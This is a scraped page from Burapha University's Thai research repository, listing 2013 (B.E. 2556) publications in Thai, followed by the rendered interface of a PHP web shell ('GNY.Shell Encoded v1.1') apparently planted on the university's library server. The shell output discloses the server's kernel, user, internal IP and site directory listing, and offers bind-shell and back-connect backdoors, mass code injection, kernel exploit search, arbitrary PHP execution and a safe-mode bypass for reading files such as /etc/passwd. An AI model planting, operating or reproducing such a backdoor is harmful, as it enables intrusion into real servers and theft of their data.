งานวิจัยมหาวิทยาลัยบูรพา

Found 2200 results
Author Keyword Title [ Year(Asc)]
2556
กุลยา ลิ้มรุ่งเรืองรัตน์., วิชมณี ยืนยงพุทธกาล., กระแสร์ชล นิสานารถ, อาภัสรา แสงนาค., Kullaya Limroongreungrat., Wichamanee Yuenyongputtakal., Nisanarth Krasaechol., Arpathsra Sangnark. การพัฒนาผลิตภัณฑ์ซุปเพื่อสุขภาพกึ่งสำเร็จรูปแบบแห้งและซุปก้อนปรุงรสที่มีโซเดียมต่ำจากผักและสมุนไพรไทยเพื่อผู้บริโภควัยสูงอายุ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ศิรินา โพยประโคน., Sirina Poyprakhon., นิยมศรีสมศักดิ์. สิทธิพร, Sittiporn Niyomsrisomsak. การพัฒนาพฤติกรรมการสอนภาษาไทยของครูผู้สอน โดยใช้ทฤษฎีคอนสตรัคติวิซึม: กรณีศึกษาโรงเรียนมารีวิทย์. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(37)
พิสิษฐ์ พิริยาพรรณ., เวธกา กลิ่นวิชิต., พวงทอง อินใจ., รัชนีภรณ์ ทรัพย์กรานนท์., วารี กังใจ., Pisit Piriyapun, Wethaka Klinwichit., Paungtong Inchai., Ratcharneeporn Subgranon., Waree Kangchai. การพัฒนามาตรฐานการดูแลสุขภาพผู้สูงอายุในศูนย์การให้บริการแบบพักค้าง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
พงศ์เทพ จิระโร., มนตรี แย้มกสิกร., ประชา อินัง., บุนขง ทุมวงศ์., Pongthep Jiraro., Montree Yamkasikorn., Pracha Inang., Bunkhong Tumvong. การพัฒนาระบบประกันคุณภาพภายในกรมการศึกษานอกโรงเรียน ประเทศสาธารณรัฐประชาธิปไตยประชาชนลาว. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
พิสิษฐ์ พิริยาพรรณ., เวธกา กลิ่นวิชิต., ไพบูลย์ พงษ์แสงพันธ์., กาญจนา พิบูลย์., พวงทอง อินใจ., สมชาย ยงศิริ., ยุวดี รอดจากภัย., สิริลักษณ์ โสมานุสรณ์., Pisit Piriyapun, Wethaka Klinwichit., Paiboon Pongsaengpan., Kanchana Piboon., Paungtong Inchai., Somchai Yongsiri., Yuwadee Rodjarkpai., Sirilak Somanusorn. การพัฒนารูปแบบการดูแลผู้สูงอายุครบวงจรแบบบูรณาการ (ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ไพบูลย์ พงษ์แสงพันธ์., ยุวดี รอดจากภัย., Paiboon Pongsaengpan., Yuwadee Rodjarkpai. การพัฒนารูปแบบการสร้างเสริมสุขภาพผู้สูงอายุโดยใช้การมีส่วนร่วมของชุมชน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อ่วมนุช. เบญจา, วิชิต สุรัตน์เรืองชัย., ไพรัตน์ วงษ์นาม., Benja Oumnouch., Vichien Suratruangchai., Pairatana Wongnam. การพัฒนารูปแบบการสอนกลุ่มสาระการเรียนรู้คณิตศาสตร์ตามทฤษฎีพฤติกรรมตามแผน ทฤษฎีการประมวลสารสนเทศ และมโนทัศน์การรู้คิด สำหรับนักเรียนชั้นมัธยมศึกษาตอนต้น. วารสารศึกษาศาสตร์ มหาวิทยาลัยบูรพา = Journal of education. 2556;24(2)
อุไรวรรณ อินทมาโส., สิทธิศักดิ์ เกตุขุนทด., จันทรัตน์ ภูมิพื้นผล., Uraiwan Intamaso., Sitthisak Ketkhunthod., Jantharat Pumpunphol. การพัฒนาวิธีการตรวจสอบการปนเปื้อนของไวรัสตับอักเสบชนิดเอในหอยนางรมที่เพาะเลี้ยงในพื้นที่ชายฝั่งทะเลภาคตะวันออก. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
วีรพงศ์ วุฒิพันธุ์ชัย., สุบัณฑิต นิ่มรัตน์., Verapong Vuthiphandchai., Subuntith Nimrat. การพัฒนาศักยภาพในการจัดเก็บรักษาน้ำเชื้อปลายี่สกไทยเพื่อการเพาะเลี้ยงสัตว์น้ำและการอนุรักษ์ (รายงานการวิจัยฉบับสมบูรณ์ปีที่ 2). ชลบุรี. (Chonburi).: มหาวิทยาลัย. (Burapha University).; 2556.
เวธกา กลิ่นวิชิต., Wethaka Klinwichit., ยุวดี รอดจากภัย., Yuwadee Rodjarkpai., คนึงนิจ อุสิมาศ., Kanungnit U-Simat. การพัฒนาสารสนเทศด้านสุขภาพของผู้สูงอายุ (ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ชลี ไพบูลย์กิจกุล., เบ็ญจมาศ ไพบูลย์กิจกุล., รชนิมุข หิรัญสัจจาเลิศ., Chalee Paibulkichakul., Benjamas Paibulkichakul., Rachanimuk Hiransuchalert. การพัฒนาสารเร่งสีสำหรับสัตว์น้ำจากดอกดาวเรือง Tagetes animals. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ศรีกระจ่าง. พจนา, Srekrachang. P, ศุขปรีดี. ลัดดา, Sookpreedee. L. การพัฒนาหนังสืออิเล็กทรอนิกส์สาระการเรียนรู้วิทยาศาสตร์ เรื่องระบบสุริยะ ชั้นประถมศึกษาปีที่ 4. วารสารการศึกษาและการพัฒนาสังคม = Journal of education and social development 2556;9(1)
ประนอม โอทกานนท์., รัชนีภรณ์ ทรัพย์กรานนท์., วารี กังใจ., สิริลักษณ์ โสมานุสรณ์., Pranom Othaganont., Ratcharneeporn Subgranon., Waree Kangchai., Sirilak Somanusorn. การพัฒนาหลักสูตรอบรมทักษะการจัดการความรู้ ด้านการสร้างเสริมสุขภาพสำหรับผู้สูงอายุ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
มนตรี แย้มกสิกร., วิชิต สุรัตน์เรืองชัย., วิมลรัตน์ จตุรานนท์., จันทร์พร พรหมมาศ., ศิริสวัสดิ์. เชษฐ์, พงศ์เทพ จิระโร., Montree Yamkasikorn., Vichien Suratruangchai., Wimonrat Chaturanon., Chanphorn Prommas., Pongthep Jiraro. การพัฒนาหลักสูตรเพื่อการเตรียมความพร้อมพัฒนาครูกลุ่มประเทศอาเซียน : การศึกษานำร่องนิสิตทุนพัฒนาครูรัฐบาลประเทศสาธารณรัฐอินโดนีเซีย. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อนุกูล บูรณประทีปรัตน์., Anukul Buranapratheprat. การพัฒนาอัลกอริธึมโดยใช้คุณสมบัติเชิงแสงของน้ำทะเล เพื่อการประมาณค่าความเค็มบริเวณอ่าวไทยตอนบน. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
หรรษาศิริพจน์. บุญสม, Boonsom Hansasiripot., Chakrit Noranitipadungkarn., นรนิติผดุงการ. จักรกฤษณ์, ขัตติยา กรรณสูต. การพัฒนาเครื่องมือวัดคุณภาพชีวิต: มิติความสุข. วารสารการเมือง การบริหาร และกฎหมาย = Journal of Politics, administration and Law 2556;5(1)
วีรพงศ์ วุฒิพันธุ์ชัย., สุบัณฑิต นิ่มรัตน์., Verapong Vuthiphandchai., Subuntith Nimrat. การพัฒนาเทคนิคการเก็บรักษาน้ำเชื้อหอยเป๋าฮื้อ (Haliotis asinina) เพื่อการเพาะเลี้ยงเชิงพาณิชย์. (รายงานวิจัยฉบับสมบูรณ์ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัย. (Burapha University).; 2556.
วีรพงศ์ วุฒิพันธุ์ชัย., สุบัณฑิต นิ่มรัตน์., Verapong Vuthiphandchai., Subuntith Nimrat. การพัฒนาเทคโนโลยีการเก็บรักษาถุงน้ำเชื้อกุ้งกุลาดำที่อุณหภูมิต่ำ เพื่อการเพาะเลี้ยงและการอนุรักษ์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
วรเทพ มุธุวรรณ., เสาวภา สวัสดิ์พีระ., จารุนันท์ ประทุมยศ., ณัฐวุฒิ เหลืองอ่อน., วิรชา เจริญดี., ธรรมศักดิ์ ถาพรพันธุ์., Vorathep Muthwan., Saowapa Sawatpeera, Jarunan Pratoomyot., Nattawut Luang-oon., Wiracha Charoendee., Thammasak Tapornpan., Institute of Marine Science. การพัฒนาเทคโนโลยีการเพาะเลี้ยงกุ้งทะเลสวยงาม (กุ้งการ์ตูน, Hymenocerapicta) เพื่อการอนุรักษ์และการผลิตเชิงพาณิชย์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เสาวภา สวัสดิ์พีระ., Sawatpeera. S. การพัฒนาเทคโนโลยีการเพาะเลี้ยงปลาแมนดาริน, Synchiropus splendidus (Herre, 1927) เพื่อการอนุรักษ์และการผลิตเชิงพาณิชย์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เบ็ญจมาศ ไพบูลย์กิจกุล., รชนิมุข หิรัญสัจจาเลิศ., ชลี ไพบูลย์กิจกุล., Benjamas Paibulkichakul., Rachanimuk Hiransuchalert., Chalee Paibulkichakul. การพัฒนาและออกแบบระบบบำบัดน้ำทางชีวภาพในโรงเรือนที่เหมาะสมต่อการเพาะเลี้ยงสัตว์น้ำ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สลิล ชั้นโรจน์., Salil Chanroj. การพัฒนาแหนเพื่อเป็นพืชน้ำต้นแบบในการวิจัยพื้นฐานและการนำไปประยุกต์ใช้ทางเทคโนโลยีชีวภาพ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ธีระ กุลสวัสดิ์., Teera Kulsawat., เสรี ชัดแช้ม., สมสิทธิ์ จิตรสถาพร., Seree Chadcham. การพัฒนาโมเดลพฤติกรรมการใช้อีเลิร์นนิ่งของนักศึกษาระดับปริญญาตรี. วารสารการเมือง การบริหาร และกฎหมาย = Journal of Politics, administration and Law 2556;5(3)
วาสนา บูชาพันธ์., Wasana Boochapun. การรับรู้และการเปิดรับข่าวสารเรื่องยาเสพติดของผู้ใช้แรงงาน เพื่อป้องกันและแก้ไขปัญหายาเสพติด: กรณีศึกษา บริษัทคอบร้า อินเตอร์ เนชั่นแนล จำกัด. วารสารการเมือง การบริหาร และกฎหมาย = Journal of Politics, administration and Law 2556;5(1)
สุพจน์ บุญวิเศษ., Supot Boonwises. การรับรู้และบทบาทของเทศบาลตำบลที่มีต่อการจัดการสวัสดิการผู้สูงอายุในเขตพื้นที่จังหวัดชลบุรี. การเมือง การบริหาร และกฎหมาย 2556;5(3)

Pages

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.15 GB of 389.83 GB (68.27%)Server IP: 10.32.1.15 - Your IP: 54.167.175.218

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0206 ]:.